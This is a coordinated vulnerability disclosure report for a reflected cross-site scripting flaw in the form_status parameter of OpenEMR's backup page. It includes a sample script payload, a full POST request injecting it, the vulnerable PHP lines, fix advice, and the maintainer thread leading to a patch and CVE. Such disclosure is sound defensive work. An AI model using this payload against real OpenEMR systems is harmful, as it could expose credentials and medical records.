Reflected Cross Site Scripting in OpenEMR 7.0.0 and below at backup in openemr/openemr

Valid

Reported on

Jul 19th 2022


Description

We would like to report the vulnerability we found during software testing. The OpenEMR 7.0.0 (latest version) and below version Open Source electronic health records and medical practice management application has Reflected Cross Site Scripting vulnerability in the {form_status} parameter on backup page that never been reported before (We've checked from CVE Official website).

Vulnerability Type

Reflected Cross Site-Scripting (XSS)

Affected Page/URL

https://<openemrurl>/interface/main/backup.php {form_status}

Sample XSS Payload

' /><script>alert(`CVE_Hunting_XSS`)</script>

Vulnerable Source Code

/var/www/localhost/htdocs/openemr/interface/main/backup.php (Please see more details in the occurrences section)

Implication

This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

Recommendation

Whitelist validation at server side should be performed for all input fields and parameters in the entire application to ensure that only valid input is processed. The validation should decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting the input. Special characters such as `’/;&*()%!+{}[]|# including Carriage Return (ASCII 1, \r, %0d) as well as Line Feed (ASCII 10, \n, %0a) should be filtered out prior to server processing form fields and hidden form fields. In case special characters should be allowed into an input field, the application should use a standard function to “escape” the special characters. Alternatively, all parameters returned to the user’s browser should be sanitized so that client-side scripting attacks would not be effective. Output HTML encoding should be properly implemented to prevent execution of malicious script on user’s browser.

Discoverer/Reporters

  • Ammarit Thongthua, Rattapon Jitprajong and Nattakit Intarasorn from Secure D Center Research Team

Example PoC Screenshots

OpenEMR Version 6.1.0

CVEHunting-Open-EMR-6-1-0-version.png

OpenEMR Version 7.0.0

Screen-Shot-2022-07-20-at-3-18-07-PM.png

Backup Page

CVEHunting-Open-EMR-6-1-0-Backup.png

Click Create Backup or Create Eventlog Backup then Injected malicious JavaScript Payload in to {form_status} with Sample XSS Payload

POST /interface/main/backup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------134273974110212498243185026588
Content-Length: 626
Origin: https://localhost
Connection: close
Referer: https://localhost/interface/main/backup.php
Cookie: OpenEMR=sDB13cXmxjjPS6d-BF8dtr9D5Kj8PkbOg2oMdxqSKMMo1C7Y
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="csrf_token_form"

4a2e4c79d44d123017f7ff6850e337c8c17557e3
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_backup"

ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_step"

ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_status"

' /><script>alert(`CVE_Hunting_XSS`)</script>
-----------------------------134273974110212498243185026588--

CVEHunting-Open-EMR-6-1-0-Po-C.png

Renderred Malicious JavaScript (XSS)

CVEHunting-Open-EMR-6-1-0-XSS-Renderred.png

Impact

This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

Occurrences

if ($form_step == 203) {
    $form_status .= xla('Done') . ".";
    echo nl2br($form_status);
}
if ($form_step == 1) {
    $form_status .= xla('Dumping OpenEMR database') . "...<br />";
    echo nl2br($form_status);
    if (file_exists($TAR_FILE_PATH)) {
        if (! unlink($TAR_FILE_PATH)) {
            die(xlt("Couldn't remove old backup file:") . " " . text($TAR_FILE_PATH));
        }
    }
<input type='hidden' name='form_status' value='<?php echo $form_status; ?>' />
if ($form_step == 202) {
  // Process uploaded config file.
    if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $EXPORT_FILE)) {
            $form_status .= xla('Applying') . "...<br />";
            echo nl2br($form_status);
            $cmd = escapeshellcmd($mysql_cmd) . " -u " . escapeshellarg($sqlconf["login"]) .
            " -p" . escapeshellarg($sqlconf["pass"]) .
            " -h " . escapeshellarg($sqlconf["host"]) .
            " --port=" . escapeshellarg($sqlconf["port"]) .
            " $mysql_ssl " .
            escapeshellarg($sqlconf["dbase"]) .
            " < " . escapeshellarg($EXPORT_FILE);
        } else {
            echo xlt('Internal error accessing uploaded file!');
            $form_step = -1;
        }
    } else {
        echo xlt('Upload failed!');
        $form_step = -1;
    }

    $auto_continue = true;
}
if ($form_step == 3) {
    $form_status .= xla('Dumping OpenEMR web directory tree') . "...<br />";
    echo nl2br($form_status);
    $cur_dir = getcwd();
    chdir($webserver_root);
if ($form_step == 103) {
    $form_status .= xla('Done.  Will now send download.') . "<br />";
    echo nl2br($form_status);
    $auto_continue = true;
}
We are processing your report and will contact the openemr team within 24 hours. 2 months ago
JohnNattakit modified the report
2 months ago
JohnNattakit modified the report
2 months ago
JohnNattakit modified the report
2 months ago
We have contacted a member of the openemr team and are waiting to hear back 2 months ago
JohnNattakit modified the report
2 months ago
We have sent a follow up to the openemr team. We will try again in 7 days. 2 months ago
openemr/openemr maintainer validated this vulnerability 2 months ago

Thanks for the report. Working on a fix now.

JohnNattakit has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the openemr team. We will try again in 7 days. 2 months ago
Brady Miller
2 months ago

Maintainer


A preliminary fix has been posted in commit 285fb234bd27ea4c46a29f2797edda7f38f1d8db

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, then will be ok to make CVE # and make it public.

Thanks!

We have sent a second fix follow up to the openemr team. We will try again in 10 days. 2 months ago
JohnNattakit
2 months ago

Researcher


Dear @Brady Miller, @admin Hope you are doing well. We have got the notification email that the 1st patch for OpenEMR 7.0.0 has been released. Can the CVE be assigned to this issue? Screen-Shot-2022-08-08-at-9-48-42-AM.png

Jamie Slome
a month ago

Admin


Just waiting for the go-ahead from the maintainer and then we can assign and publish a CVE for this report 👍

Brady Miller confirmed that a fix has been merged on 285fb2 a month ago
The fix bounty has been dropped
backup.php#L549 has been validated
backup.php#L903 has been validated
backup.php#L503 has been validated
backup.php#L1029 has been validated
backup.php#L923 has been validated
backup.php#L945 has been validated
Brady Miller
a month ago

Maintainer


OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.

JohnNattakit
a month ago

Researcher


Dear @Admin, @Jamie Slome Could you please help to assign the CVE for this finding please? Thanks and appreciate for your help 👍

@Brady Miller Thanks for your response 👍

Jamie Slome
a month ago

Admin


CVE assigned and will automatically publish in the next few hours ♥️

JohnNattakit
a month ago

Researcher


@Jamie Slome Appreciate for your contribution 👍♥️

to join this conversation